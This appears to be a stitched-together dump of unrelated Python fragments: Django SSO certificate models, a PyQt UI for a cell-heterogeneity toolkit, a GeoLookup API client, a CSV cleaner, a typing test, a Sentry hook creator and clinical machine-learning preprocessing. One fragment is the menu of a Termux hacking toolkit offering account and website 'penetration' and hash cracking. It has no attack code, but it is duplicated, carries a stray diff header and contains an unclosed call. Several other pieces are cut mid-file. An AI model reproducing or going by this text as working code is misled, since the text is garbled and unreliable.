models.CharField( max_length=50, default=IdentityProviderType.AZURE_AD, choices=IdentityProviderType.CHOICES, ) # whether an IdP is editable by its BillingAccount owner # (it will always be editable by accounting admins) is_editable = models.BooleanField(default=False) # whether an IdP is actively in use as an authentication method on HQ is_active = models.BooleanField(default=False) # the enterprise admins of this account will be able to edit the SAML # configuration fields owner = models.ForeignKey(BillingAccount, on_delete=models.PROTECT) # these are fields required by the external IdP to form a SAML request entity_id = models.TextField(blank=True, null=True) login_url = models.TextField(blank=True, null=True) logout_url = models.TextField(blank=True, null=True) idp_cert_public = models.TextField(blank=True, null=True) # the date the IdP's SAML signing certificate expires. # this will be filled out by enterprise admins date_idp_cert_expiration = models.DateTimeField(blank=True, null=True) # as the service provider, this will store our x509 certificates and # will be renewed automatically by a periodic task sp_cert_public = models.TextField(blank=True, null=True) sp_cert_private = models.TextField(blank=True, null=True) date_sp_cert_expiration = models.DateTimeField(blank=True, null=True) # as the x509 certificate expires, we need to provide the IdP with our next # "rollover" cert to prepare the IdP for the transfer sp_rollover_cert_public = models.TextField(blank=True, null=True) sp_rollover_cert_private = models.TextField(blank=True, null=True) date_sp_rollover_cert_expiration = models.DateTimeField(blank=True, null=True) # for auditing purposes created_on = models.DateTimeField(auto_now_add=True) created_by = models.EmailField() last_modified = models.DateTimeField(auto_now=True) last_modified_by = models.EmailField() class Meta: app_label = 'sso' def __str__(self): return f"{self.name} IdP [{self.idp_type}]" def create_service_provider_certificate(self): sp_cert = ServiceProviderCertificate() self.sp_cert_public = sp_cert.public_key self.sp_cert_private = sp_cert.private_key self.date_sp_cert_expiration = sp_cert.date_expires self.save() def create_rollover_service_provider_certificate(self): sp_cert = ServiceProviderCertificate() self.sp_rollover_cert_public = sp_cert.public_key self.sp_rollover_cert_private = sp_cert.private_key self.date_sp_rollover_cert_expiration = sp_cert.date_expires self.save() def renew_service_provider_certificate(self): if not self.sp_rollover_cert_public: raise ServiceProviderCertificateError( "A rollover certificate for the Service Provider was never " "generated. You should first create a rollover certificate and " "leave it active for a few days to give the IdP a heads up." ) self.sp_cert_public = self.sp_rollover_cert_public self.sp_cert_private = self.sp_rollover_cert_private self.date_sp_cert_expiration = self.date_sp_rollover_cert_expiration self.sp_rollover_cert_public = None self.sp_rollover_cert_private = None self.date_sp_rollover_cert_expiration = None self.save() class AuthenticatedEmailDomain(models.Model): """ This specifies the email domains that are tied to an Identity Provider and a list of users that would be exempt from SSO. """ email_domain = models.CharField(max_length=256, db_index=True, unique=True) identity_provider = models.ForeignKey(IdentityProvider, on_delete=models.PROTECT) class Meta: app_label = 'sso' def __str__(self): return f"{self.email_domain} authenticated by [{self.identity_provider.name}]" class UserExemptFromSingleSignOn(models.Model): """ This specifies what users are exempt from SSO for a given AuthenticatedEmailDomain. Other users will be required to use SSO once an AuthenticatedEmailDomain is specified for their email domain. """ username = models.CharField(max_length=128, db_index=True) email_domain = models.ForeignKey(AuthenticatedEmailDomain, on_delete=models.CASCADE) class Meta: app_label = 'sso' def __str__(self): return f"{self.username} is exempt from SSO with {self.email_domain}" class TrustedIdentityProvider(models.Model): """ This specifies the trust between domains (who are not associated with the IdP's BillingAccount owner) and an IdentityProvider """ domain = models.CharField(max_length=256, db_index=True) identity_provider = models.ForeignKey(IdentityProvider, on_delete=models.PROTECT) date_acknowledged = models.DateTimeField(auto_now_add=True) acknowledged_by = models.EmailField() class Meta: app_label = 'sso' def __str__(self): return f"{self.domain} trusts [{self.identity_provider.name}]" michaelcolman/Sub_cellular_heterogeneity_TOOLKIT from PyQt5 import QtCore, QtGui, QtWidgets from lib.Themes import app_dark_mode from matplotlib.figure import Figure from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as Toolbar from matplotlib.widgets import RectangleSelector def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "HetKit")) self.labelTitle.setText(_translate("MainWindow", "Sub-Cellular Heterogeneity Toolkit")) self.labelDoc1.setText(_translate("MainWindow", "Find the documentation at:")) self.labelMaxx.setText(_translate("MainWindow", "Developed by the Leeds Computational Physiology Lab")) self.labelDoc2.setText(_translate("MainWindow", "https://github.com/michaelcolman/Sub_cellular_heterogeneity_TOOLKIT")) self.labelEmail.setText(_translate("MainWindow", "Contact us at ")) # self.labelLogo.setText(_translate("MainWindow", "

")) self.labelID.setText(_translate("MainWindow", "Analysis ID:")) self.entryID.setPlaceholderText(_translate("MainWindow", "Type an existing ID & load data, or create a new one!")) self.buttonLoad.setText(_translate("MainWindow", "Load Data")) self.labelData.setText(_translate("MainWindow", "Data Path:")) self.labelPath.setText(_translate("MainWindow", "Load an analysis or browse to select data")) self.buttonBrowse.setText(_translate("MainWindow", "Browse")) self.buttonHelp1.setText(_translate("MainWindow", "Help")) self.buttonContinue.setText(_translate("MainWindow", "Continue")) self.buttonCreateSRF.setText(_translate("MainWindow", "Create SRF")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabID), _translate("MainWindow", "ID && Load Data")) self.labelRGB.setText(_translate("MainWindow", "RGB Channel Selection")) self.rbRed.setText(_translate("MainWindow", "Red")) self.rbGreen.setText(_translate("MainWindow", "Green")) self.rbBlue.setText(_translate("MainWindow", "Blue")) self.rbAll.setText(_translate("MainWindow", "None")) self.labelCropTitle.setText(_translate("MainWindow", "Cropping")) self.labelCrop.setText(_translate("MainWindow", "Draw a region on the plot to set a crop")) self.labelCoords.setText(_translate("MainWindow", "Co-ordinates: (X1, Y1), (X2, Y2)")) self.labelDS.setText(_translate("MainWindow", "Downsampling")) self.entryX1.setPlaceholderText(_translate("MainWindow", "0.09")) self.entryY1.setPlaceholderText(_translate("MainWindow", "0.09")) self.entryX2.setPlaceholderText(_translate("MainWindow", "1.0")) self.entryY2.setPlaceholderText(_translate("MainWindow", "1.0")) self.labelDSImage.setText(_translate("MainWindow", "Image (μm)")) self.labelDSNew.setText(_translate("MainWindow", "New Scale (μm)")) self.labelDSX1.setText(_translate("MainWindow", "X-Axis")) self.labelDSX2.setText(_translate("MainWindow", "X-Axis")) self.labelDSY2.setText(_translate("MainWindow", "Y-Axis")) self.labelDSY1.setText(_translate("MainWindow", "Y-Axis")) self.labelRotate.setText(_translate("MainWindow", "Image Rotation")) self.labelDegrees.setText(_translate("MainWindow", "Degrees Clockwise:")) self.buttonRotate.setText(_translate("MainWindow", "Rotate")) self.buttonHelp2.setText(_translate("MainWindow", "Help")) self.buttonReset.setText(_translate("MainWindow", "Reset")) self.buttonApply.setText(_translate("MainWindow", "Apply")) self.labelStack.setText(_translate("MainWindow", "Current Image in Stack: 1")) self.buttonContinue2.setText(_translate("MainWindow", "Continue")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabConfig), _translate("MainWindow", "Configuration")) self.labelAnalTitle.setText(_translate("MainWindow", "Analysis Settings")) self.labelBinCount.setText(_translate("MainWindow", "Bin Count Range:")) self.labelBinSize.setText(_translate("MainWindow", "Bin Size Range:")) self.labelBCTo.setText(_translate("MainWindow", "to")) self.labelBCto2.setText(_translate("MainWindow", "to")) self.labelOutSettings.setText(_translate("MainWindow", "Output Settings")) self.checkOPDefault.setText(_translate("MainWindow", "All (Default)")) self.checkOPRotate.setText(_translate("MainWindow", "Rotated")) self.checkOPCropped.setText(_translate("MainWindow", "Cropped")) self.checkOPDownsample.setText(_translate("MainWindow", "Downsampled")) self.checkOPVario.setText(_translate("MainWindow", "Variograms")) self.checkOPHist.setText(_translate("MainWindow", "Histograms")) self.buttonHelp3.setText(_translate("MainWindow", "Help")) self.buttonStartVario.setText(_translate("MainWindow", "Start Variogram Analysis")) self.buttonContinue3.setText(_translate("MainWindow", "Continue")) self.buttonResults.setText(_translate("MainWindow", "Analysis Results")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabVario), _translate("MainWindow", "Variogram Analysis")) self.labelSRFTitle.setText(_translate("MainWindow", "Generate Spatial Random Fields")) self.labelSRFName.setText(_translate("MainWindow", "SRF Name:")) self.labelSRFNum.setText(_translate("MainWindow", "Number of SRFS:")) self.labelSRFDimensions.setText(_translate("MainWindow", "

Dimensions (Voxels)

")) self.labelSRFDimX.setText(_translate("MainWindow", "X")) self.labelSRFDimY.setText(_translate("MainWindow", "Y")) self.labelSRFDimZ.setText(_translate("MainWindow", "Z")) self.buttonGenSRF.setText(_translate("MainWindow", "Generate Spatial Random Fields")) self.CB_SRFFull.setText(_translate("MainWindow", " MSCSF Full Cell")) self.CB_SRFPart.setText(_translate("MainWindow", " MSCSF Part Cell")) self.labelLengthscales.setText(_translate("MainWindow", "Lengthscales")) self.labelLenTransverse.setText(_translate("MainWindow", "Transverse")) self.labelLenLong.setText(_translate("MainWindow", "Longitudinal")) self.buttonUseResults.setText(_translate("MainWindow", "Use Analysis Results")) self.labelLenCustom.setText(_translate("MainWindow", "Custom Lengthscales (μm)")) self.buttonGenPreview.setText(_translate("MainWindow", "Generate 2D Preview")) self.buttonHelp4.setText(_translate("MainWindow", "Help")) self.buttonSRFLocation.setText(_translate("MainWindow", "Open SRF Location")) self.labelOptions.setText(_translate("MainWindow", "Options")) self.labelNeighbour.setText(_translate("MainWindow", "Variance (Proportion):")) self.labelMeanExp.setText(_translate("MainWindow", "Mean Expression:")) self.buttonLoadVTK.setText(_translate("MainWindow", "Load VTK File")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabSRF), _translate("MainWindow", "Spatial Random Field")) days = ["shanbe", "1shanbe", "2shanbe", "3shanbe", "4shanbe", "5shanbe", "jome"] day_dict = {day:True for day in days} for i in range(3): input() for day in input().split(): day_dict[day] = False print(sum(day_dict[day] for day in day_dict)) # -*- mode: python; coding: utf-8 -*- # # FirePython server-side support library # # for usage see README.markdown or http://github.com/woid/firepython # __version__ = '0.2' from django.core.exceptions import PermissionDenied from django.shortcuts import redirect from .models import Participant def phone_number_verified(function): def wrap(request, *args, **kwargs): participant = Participant.objects.get(user=request.user) if participant.verifiedPhone: return function(request, *args, **kwargs) else: return redirect('render_phone_auth') wrap.__doc__ = function.__doc__ wrap.__name__ = function.__name__ return wrap class CodeChecks: def bracket_check(self, text): """Check if that if every open bracket has a closing one.""" counter = 0 for letter in text: if letter == '{': counter += 1 elif letter == '}': counter -= 1 if counter < 0: raise Exception("Missing opening/closing bracket") # TODO: custom exceptions if counter == 0: return True else: raise Exception("Missing opening/closing bracket") # TODO: custom exceptions from django.test import TestCase from bailiwick.test import ModelViewTestSuite from .. import factory class ARecordViewTestCase(ModelViewTestSuite, TestCase): root_url = "records/a" model_factory = factory.ARecordFactory class NsRecordViewTestCase(ModelViewTestSuite, TestCase): root_url = "records/ns" model_factory = factory.NsRecordFactory class MxRecordViewTestCase(ModelViewTestSuite, TestCase): root_url = "records/mx" model_factory = factory.MxRecordFactory CONSUMER_KEY = '' CONSUMER_SECRET = '' ACCESS_TOKEN_KEY = '' ACCESS_TOKEN_SECRET = '' Inf1n1te/Seth class GradeException(Exception): def __init__(self, *args, **kwargs): super(GradeException, self).__init__(self, *args, **kwargs) 1-10 """GeoLookup Class""" from __future__ import print_function import time import pprint # Third Party import requests # Local imports from zat.utils import cache class GeoLookup(object): """GeoLookup: Query IPStack API (https://ipstack.com/) for Geographic information, the class contains a Cache to minimize queries. Args: apikey (str): The API key to use for IPStack queries (default=None) summary (bool): Just return summary information for GeoLookup (default=True) max_cache_size (int): Maximum size of query cache (default=10000) max_cache_time (int): Time to keep query results in cache (default=30 days) """ def __init__(self, apikey=None, summary=True, max_cache_size=10000, max_cache_time=30, throttle=True): """GeoLookup Init""" # Public API Key # Note: The key below is a low-volume public key. Please call this method with your own API key :) if apikey is None: print('Using public API Key: Please set apikey= when creating this class') pub_apikey = '' self.known_ipstack_ips = ['192.168.3.11', '192.168.127.12', '192.168.127.12'] self.apikey = apikey or pub_apikey self.summary = summary self.throttle = throttle # Create query cache seconds = max_cache_time*24*60*60 # Convert from days self.query_cache = cache.Cache(max_size=max_cache_size, timeout=seconds, load='zat_geo_cache') # Convert to Seconds @property def size(self): return self.query_cache.size def query_ip(self, ip_address, verbose=False): """Query method for the IpStack Service Args: ip_address(str): The IP Address to be queried """ # Is this a known IpStack ip address? if ip_address in self.known_ipstack_ips: return None # First check query cache cached = self.query_cache.get(ip_address) if cached: if verbose: print('Returning Cached Query Results') return cached # Not in cache so make the actual query url = 'http://api.ipstack.com/' + ip_address response = requests.post(url, params={'access_key': self.apikey}) # Make sure we got a json blob back try: output = response.json() except ValueError: error_msg = 'No valid response, throttling and trying again...' if self.throttle: if verbose: print(error_msg) time.sleep(30) return self.query_ip(ip_address) return {'error': error_msg} # Check for error or not-found if output['type'] is None: output = None self.query_cache.set(ip_address, output) return output # Summary removes 'location' info (flag, calling_code, languages, etc) if self.summary: del output['location'] # Put results in Cache self.query_cache.set(ip_address, output) self.query_cache.persist() # Return results return output # Unit test: Create the class and test it def test(): """geo_lookup.py test""" # Execute the worker (unit test) geo_lookup = GeoLookup(summary=False) output = geo_lookup.query_ip('172.16.31.10') print('\n<<< Unit Test FULL>>>') pprint.pprint(output) geo_lookup = GeoLookup() output = geo_lookup.query_ip('172.16.31.10') print('\n<<< Unit Test Summary>>>') pprint.pprint(output) output = geo_lookup.query_ip('172.16.58.3') print('\n<<< Unit Test Summary>>>') pprint.pprint(output) # Test Cache output = geo_lookup.query_ip('73.26.145.66') print('\n<<< Unit Test Cache>>>') pprint.pprint(output) # Test Size assert geo_lookup.size == 2 # Test some error conditions output = geo_lookup.query_ip('123') print('\n<<< Unit Test Malformed IP Query>>>') pprint.pprint(output) if __name__ == "__main__": test() class StaticGenerator: def __init__(self, metadata1): self.metadata1 = metadata1 def generate(self): return self.metadata1 >> CREATED BY: and BCF-Bangladesh >> Facebook : >> Instagram: @eliash >>>ONLY FOR TERMUX<<< =============================================== 1. Basic Command 2. Account Penetration 3. Website Penetration 4. Hash Cracker 5. Termux 6. Error Fixer 7. Open Old STARK2.0""","green"), colored(""" I. Important Application's""","cyan", attrs=['bold']), colored(""" M. Hacking Movie's""","green"), colored(""" S. Secret There Is No Secret0_0""","red", attrs=['bold']), colored(""" F. Follow Us""","magenta", attrs=['bold']), colored(""" C. Credits""","white", attrs=['bold']), colored(""" U. Update""","blue", attrs=['bold']), colored(""" ================================================""","green"), colored(""" H. Help""","yellow", attrs=['bold']), colored(""" E. EXIT ================================================ """,'green') loop = True while loop: menu() stark = raw_input("stark > ") if stark == "1": os.system("clear") BasicC() elif stark == "2": os.system("clear") AccountH()# encoding: utf-8 import os import sys from time import sleep as timeout from core.starkmcore import * from core.guidemcore import * from multiprocessing import Process from termcolor import colored checkfile() def menu(): os.system("clear") print colored(""" ..######..########....###....########..##....## .##....##....##......##.##...##.....##.##...##. .##..........##.....##...##..##.....##.##..##.. ..######.....##....##.....##.########..#####... .......##....##....#########.##...##...##..##.. .##....##....##....##.....##.##....##..##...##. ..######.....##....##.....##.##.....##.##....## 3.0 >> CREATED BY:Eliash STARK and BCF-Bangladesh >> Facebook : >> Instagram: @eliash >>>ONLY FOR TERMUX<<< =============================================== @@ -67,6 +124,19 @@ def menu(): Termux() elif stark == "6": EFixer() elif stark == "i" or stark == "I": checkofflineapp( elif stark == "3": os.system("clear") WebH() elif stark == "4": os.system("clear") HASH() elif stark == "5": os.system("clear") Termux() elif stark == "6": EFixer() elif stark == "i" or stark == "I": checkofflineapp() impapp() # --- Suonostore --- # Read config file # Download CSV file (no disk) # Clean file, save from requests import Session from .supplier import Supplier, fix_illegal_sep_quotes, switch_sep, fix_illegal_inch # , ScappamentoError supplier_name = 'Suonostore' def fix_timestamp(line): return line.replace('00:00:00', '').replace('/ /', '') def fix_decimals(line): return line.replace('.00000,', ',').replace('.000,', ',').replace('.00,', ',') def update(): # Credentials and URLs key_list = ['user', 'password', 'csv_url', 'csv_filename', 'target_path'] suonostore = Supplier(supplier_name, key_list) print(suonostore) [user, password, csv_url, csv_filename, target_path] = suonostore.val_list # Download with Session() as s: print('Downloading with auth...') # Site uses HTTP Basic Auth r = s.get(csv_url, auth=(user, password), headers={'User-Agent': 'Chrome'}) # Cleanup: numbers, separators, dates, symbols sep = ';' new_csv = '' line_count = 0 problematic_line_count = 0 problematic_field_count = 0 fixed_problematic_line_count = 0 print('Cleaning up...') for line in r.content.decode(r.encoding).splitlines(): # each line in the CSV file if not line_count: # skip first line = CSV header new_csv = switch_sep(line, ',', sep) # initialize line_count = line_count + 1 continue temp_line = fix_timestamp(line) temp_line = fix_decimals(temp_line) temp_line = temp_line.replace('", ', '"; ') # hack temp_line = switch_sep(temp_line, ',', sep) temp_line, sep_modified = fix_illegal_sep_quotes(temp_line, sep, ',') # fix illegal separators field_count = 0 temp_cod_art = '' rebuilt_temp_line = '' found_problematic_field = False match = False for field in temp_line.split(';'): # for each field in line: look for double quotes as symbols if field_count == 1: # if second field temp_cod_art = field if field.count('"') % 2: # if double quotes parity check fails found_problematic_field = True [temp_field, match] = fix_illegal_inch(field) rebuilt_temp_line = rebuilt_temp_line + sep + temp_field if not match: # problematic fields are copied as-is for now print('⚠ [ Row ', line_count, '][', temp_cod_art, ']', 'Uh oh: field ', field_count + 1) problematic_field_count = problematic_field_count + 1 rebuilt_temp_line = rebuilt_temp_line + sep + field else: if not field_count: rebuilt_temp_line = field else: rebuilt_temp_line = rebuilt_temp_line + sep + field field_count = field_count + 1 if found_problematic_field or sep_modified: # if intervention was necessary if match or sep_modified: # if a solution was found fixed_problematic_line_count = fixed_problematic_line_count + 1 problematic_line_count = problematic_line_count + 1 new_csv = new_csv + '\n' + rebuilt_temp_line.strip() line_count = line_count + 1 print('⚠ ' if problematic_field_count else '✓ ', problematic_field_count, ' problematic field', '' if problematic_field_count == 1 else 's', ' in ', problematic_line_count - fixed_problematic_line_count, ' problematic line', '' if problematic_line_count - fixed_problematic_line_count == 1 else 's', ' (', problematic_line_count, ' lines total, ', fixed_problematic_line_count, ' fixed)', sep='') with open(target_path + csv_filename, 'w', encoding='utf-8') as f: f.write(new_csv) if __name__ == '__main__': update() import datetime import random list1 = ["Python is a good programming language for beginners. It is a high-level language, which means a programmer can focus on what to do instead of how to do it. Writing programs in Python" "takes less time than in some other languages","It is essentially the brain of the computer and though it is the main determining factor in the processing power of the computer as a " "whole","A computer does not have enough creativity to make tasks for which it is not programmed, so it can only follow the instructions of the programs that it has been programmed for." "The ones in charge to generate programs so that the computers may perform new tasks are programmers.","A day in the future will come when human civilization won’t be able to survive without" "computers as we depend on them too much. Till now it is a great discovery of mankind that has helped in saving thousands and millions of lives.","Programme is a sequence of instructions" "written in a proper language through which the computer can understand and solve the problem given to it. It is the method by which the whole computing process is directed and controlled.", "A flow chart illustrates the sequence of operations to be performed to arrive at the solution of a problem. The operating instructions are placed in boxes which are connected by arrows to" "indicate the order of execution.","Artificial Intelligence refers to the intelligence of machines. This is in contrast to the natural intelligence of humans and animals. With Artificial" "Intelligence, machines perform functions such as learning, planning, reasoning and problem-solving. Most noteworthy, Artificial Intelligence is the simulation of human intelligence by machines."] a = random.choice(list1) a.replace(".","") a.replace(",","") print(a) l = len(a.split()) initTime = datetime.datetime.now() b = input("Type here: ") elem1 = [x for x in a.split()] elem2 = [x for x in b.split()] correct,false = 0,0 for item in elem1: if item in elem2: correct+=1 else: false+=1 endTime = datetime.datetime.now() Time = round(((endTime - initTime).total_seconds())/60,2) n1 = round(correct/Time,0) n2 = round((correct-false)/Time,0) if n2 != 0: n3 = round((n2/n1)*100,2) else: n3 = 100 print(f"\nResults\nCongratulations, You have typed {correct} words correct out of {l} words in {Time} minutes\n") print(f"Gross Speed: {n1} WPM\nNet Speed: {n2} WPM\nAccuracy: {n3}%") src/sentry/mediators/service_hooks/creator.py1-10 from __future__ import absolute_import import six from collections import Iterable from itertools import chain from sentry.mediators import Mediator, Param from sentry.models import ServiceHook # Subscribing to these events via the UI is done in a resource-centric way. # This means you subscribe to "Issue" events. There are many types of Issue # events - this maps those resource-centric values to the actual events # emitted. EVENT_EXPANSION = { 'issue': ['issue.created'], } def expand_events(rolled_up_events): """ Convert a list of rolled up events ('issue', etc) into a list of raw event types ('issue.created', etc.) """ return set(chain.from_iterable( [EVENT_EXPANSION.get(event, [event]) for event in rolled_up_events] )) def consolidate_events(raw_events): """ Consolidate a list of raw event types ('issue.created', etc) into a list of rolled up events ('issue', etc). """ return set( name for (name, rolled_up_events) in six.iteritems(EVENT_EXPANSION) if any(set(raw_events) & set(rolled_up_events)) ) class Creator(Mediator): application = Param('sentry.models.ApiApplication', required=False) actor = Param('sentry.db.models.BaseModel') project = Param('sentry.models.Project') events = Param(Iterable) url = Param(six.string_types) def call(self): self.hook = self._create_service_hook() return self.hook def _create_service_hook(self): return ServiceHook.objects.create( application_id=self.application.id, actor_id=self.actor.id, project_id=self.project.id, events=expand_events(self.events), url=self.url, ) import os, sys import pandas as pd import numpy as np from sklearn.preprocessing import MinMaxScaler, OneHotEncoder, Imputer from sklearn.model_selection import StratifiedKFold from Compute_gower_distance import select_train_samples from sklearn.ensemble import GradientBoostingClassifier from sklearn.model_selection import GridSearchCV from sklearn.metrics import confusion_matrix, classification_report, roc_curve, accuracy_score, auc, precision_recall_fscore_support from sklearn.linear_model import LogisticRegression from sklearn.metrics import roc_auc_score from xgboost import XGBClassifier RANDOM_STATE = 15485867 folder = '/Users/xuzhenxing/Documents/mimic_AKI_data/real_time_prediction/features/all/dropped/xy' # folder = './xy' def preprocessing(folder, time_interval, isnormalized=True): """Data preprocessing, Preprocessing missing data with mean imputation; Normalize continous feature with MinMaxScaler; Normalize categorical feature with OneHotEncoder. Args: folder: dir path of source data; time_interval: interval of time, can be 24,48,72,96,120,144. Returns: x: features y: lables """ all_xy = pd.read_csv(os.path.join(folder, 'all_{}hours_test_individualization_1thousand.csv'.format(time_interval)), index_col=0) # print (all_xy.shape) # print (all_xy.columns) medi = ['diuretics', 'nsaid', 'radio', 'angiotensin'] pat = ['gender', 'age', 'ethnicity'] # Total 9 comorbidity comm = ['congestive_heart_failure', 'peripheral_vascular', 'hypertension', 'diabetes', 'liver_disease', 'mi', 'cad', 'cirrhosis', 'jaundice'] # Total 8 chartevents chart = ['DiasBP_min', 'DiasBP_max', 'DiasBP_first', 'DiasBP_last', 'DiasBP_slope', 'DiasBP_avg', 'Glucose_min', 'Glucose_max', 'Glucose_first', 'Glucose_last', 'Glucose_slope', 'Glucose_avg', 'HeartRate_min', 'HeartRate_max', 'HeartRate_first', 'HeartRate_last', 'HeartRate_slope', 'HeartRate_avg', 'MeanBP_min', 'MeanBP_max', 'MeanBP_first', 'MeanBP_last', 'MeanBP_slope', 'MeanBP_avg', 'RespRate_min', 'RespRate_max', 'RespRate_first', 'RespRate_last', 'RespRate_slope', 'RespRate_avg', 'SpO2_min', 'SpO2_max', 'SpO2_first', 'SpO2_last', 'SpO2_slope', 'SpO2_avg', 'SysBP_min', 'SysBP_max', 'SysBP_first', 'SysBP_last', 'SysBP_slope', 'SysBP_avg', 'Temp_min', 'Temp_max', 'Temp_first', 'Temp_last', 'Temp_slope', 'Temp_avg'] # Total 12 labvents lab = ['BICARBONATE_first', 'BICARBONATE_last', 'BICARBONATE_min', 'BICARBONATE_max', 'BICARBONATE_avg', 'BICARBONATE_slope', 'BICARBONATE_count', 'BUN_first', 'BUN_last', 'BUN_min', 'BUN_max', 'BUN_avg', 'BUN_slope', 'BUN_count', 'CHLORIDE_first', 'CHLORIDE_last', 'CHLORIDE_min', 'CHLORIDE_max', 'CHLORIDE_avg', 'CHLORIDE_slope', 'CHLORIDE_count', 'CREATININE_first', 'CREATININE_last', 'CREATININE_min', 'CREATININE_max', 'CREATININE_avg', 'CREATININE_slope', 'CREATININE_count', 'HEMOGLOBIN_first', 'HEMOGLOBIN_last', 'HEMOGLOBIN_min', 'HEMOGLOBIN_max', 'HEMOGLOBIN_avg', 'HEMOGLOBIN_slope', 'HEMOGLOBIN_count', 'INR_first', 'INR_last', 'INR_min', 'INR_max', 'INR_avg', 'INR_count', 'PLATELET_first', 'PLATELET_last', 'PLATELET_min', 'PLATELET_max', 'PLATELET_avg', 'PLATELET_slope', 'PLATELET_count', 'POTASSIUM_first', 'POTASSIUM_last', 'POTASSIUM_min', 'POTASSIUM_max', 'POTASSIUM_avg', 'POTASSIUM_slope', 'POTASSIUM_count', 'PT_first', 'PT_last', 'PT_min', 'PT_max', 'PT_avg', 'PT_count', 'PTT_first', 'PTT_last', 'PTT_min', 'PTT_max', 'PTT_avg', 'PTT_count', 'WBC_first', 'WBC_last', 'WBC_min', 'WBC_max', 'WBC_avg', 'WBC_slope', 'WBC_count', 'CALCIUM_first', 'CALCIUM_last', 'CALCIUM_min', 'CALCIUM_max', 'CALCIUM_avg', 'CALCIUM_count' ] if time_interval != 24: # The 24h data lack of the feature 'CALCIUM_slope' lab.append('CALCIUM_slope') subset = medi + pat + comm + ['avg_urine'] + ['egfr_min'] + ['label'] # note that ['avg_urine'] + ['egfr_min'] is important, ignoring if they are empty. all_xy = all_xy.dropna(subset=subset) # print ('after dropping nan in the catergorical variables, the shape is {}'.format(all_xy.shape)) all_conti_x = all_xy[chart + lab + ['avg_urine'] + ['egfr_min'] + ['age']] # print (all_conti_x.shape) # print (all_conti_x) all_categ_x = all_xy[['gender'] + ['ethnicity'] + medi + comm] # print (all_categ_x.shape) # print (all_categ_x) # Using mean imputer after drop the nan data in medication, patient demographic data, avg_ureine, egfr_min and label imp = Imputer(strategy='mean', axis=0) all_conti_x_fitted = imp.fit_transform(all_conti_x) def normalize(all_conti_x_fitted, all_categ_x): # using the MinMaxScaler to normalization the all_x min_max_scaler = MinMaxScaler() all_conti_x_fitted = min_max_scaler.fit_transform(all_conti_x_fitted) # print (all_conti_x_fitted.shape, all_conti_x_fitted) # all_conti_x = DataFrame(all_conti_x_fitted, columns=all_conti_x.columns) # print (all_conti_x.shape) onehot_enc = OneHotEncoder(sparse=False) # dense format all_categ_x_fitted = onehot_enc.fit_transform(all_categ_x) # print (all_categ_x_fitted.shape, all_categ_x_fitted) return all_conti_x_fitted, all_categ_x_fitted if isnormalized: all_conti_x_fitted, all_categ_x_fitted = normalize(all_conti_x_fitted, all_categ_x) x = np.hstack((all_conti_x_fitted, all_categ_x_fitted)) # y = all_xy['label'] # x = np.array(x) # y = np.array(y) # print (x.shape, y.shape) # return x, y y = all_xy['label'] z_icustay_id = y.index x = np.array(x) y = np.array(y) z_icustay_id = np.array(z_icustay_id) print (x.shape, y.shape) return x, y, z_icustay_id, all_xy def perf_model(pipe, param_grid, name, X_train, X_test, y_train, y_test, scoring, verbose=0): gs = GridSearchCV(estimator=pipe, param_grid=param_grid, scoring=scoring, cv=5, n_jobs=-1, verbose=verbose) gs.fit(X_train, y_train) y_train_pred = gs.predict(X_train) y_test_pred = gs.predict(X_test) acc_train = accuracy_score(y_true=y_train, y_pred=y_train_pred) acc_test = accuracy_score(y_true=y_test, y_pred=y_test_pred) fpr, tpr, _ = roc_curve(y_train, gs.predict_proba(X_train)[:, 1]) auc_train = auc(fpr, tpr) fpr, tpr, _ = roc_curve(y_test, gs.predict_proba(X_test)[:, 1]) auc_test = auc(fpr, tpr) confmat_train = confusion_matrix(y_true=y_train, y_pred=y_train_pred) confmat_test = confusion_matrix(y_true=y_test, y_pred=y_test_pred) print (' best parameter: ', gs.best_params_) print (' training acc:%.2f auc:%.2f ' % (acc_train, auc_train)) print (' testing acc:%.2f auc:%.2f ' % (acc_test, auc_test)) print (' train confusion matrix:\n', confmat_train) print (' testing confusion matrix:\n', confmat_test) print (' classification report:\n', classification_report(y_test, y_test_pred)) train_report = np.array(precision_recall_fscore_support(y_train, y_train_pred)) train_class1_report = train_report[:, 1] train_metrics = list(train_class1_report[:-1]) train_metrics.extend([acc_train, auc_train]) print ('training metrics: precision, recall, f1-score, acc, auc') print (train_metrics) test_report = np.array(precision_recall_fscore_support(y_test, y_test_pred)) test_class1_report = test_report[:, 1] test_metrics = list(test_class1_report[:-1]) test_metrics.extend([acc_test, auc_test]) print ('test metrics: precision, recall, f1-score, acc, auc') print (test_metrics) return train_metrics, test_metrics """ plt.xlabel("False Positive Rate") plt.ylabel("True Positive Rate (recall)") plt.plot(fpr, tpr, label="acc:%f auc:%f" % (acc_test, auc_test)) plt.legend(loc="best") plt.show() plt.close() precision, recall, _ = precision_recall_curve(y_train, gs.predict_proba(X_train)[:,1]) average_precision = average_precision_score(y_test, gs.predict_proba(X_test)[:,1]) plt.xlabel("precision") plt.ylabel("recall") plt.step(precision, recall, where='post', label='AP={0:0.2f}'.format(average_precision)) plt.legend(loc="best") plt.show() plt.close() """ def try_dbdt(X_train, X_test, y_train, y_test, scoring): gbm = GradientBoostingClassifier(learning_rate=0.05, n_estimators=120, min_samples_leaf=60, max_features=9, subsample=0.7, random_state=10) param_grid = {'max_depth': list(range(3, 14, 2)), 'min_samples_split': list(range(100, 801, 200))} train_metrics, test_metrics = perf_model(gbm, param_grid, 'GBDT', X_train, X_test, y_train, y_test, scoring, 0) return train_metrics, test_metrics def try_models_cross(X_train, X_test, y_train, y_test, scoring):# select data cross 5 Fold # X_train, X_test, y_train, y_test = train_test_split(X, Y, train_size=0.7, stratify=Y, random_state=RANDOM_STATE) # """ # print ('\n\nLinear Logistic Regression with L1 Penalty') # lgr_l1_train_metrics, lgr_l1_test_metrics = try_lgr_l1(X_train, X_test, y_train, y_test, scoring) # # print ('\n\nLinear Logistic Regression with L2 Penalty') # lgr_l2_train_metrics, lgr_l2_test_metrics = try_lgr_l2(X_train, X_test, y_train, y_test, scoring) # # print ('\n\nStochastic Gradient Descent') # Elastic_train_metrics, Elastic_test_metrics = try_sgd(X_train, X_test, y_train, y_test, scoring) # # print ('\n\nRandom Forest') # rf_train_metrics, 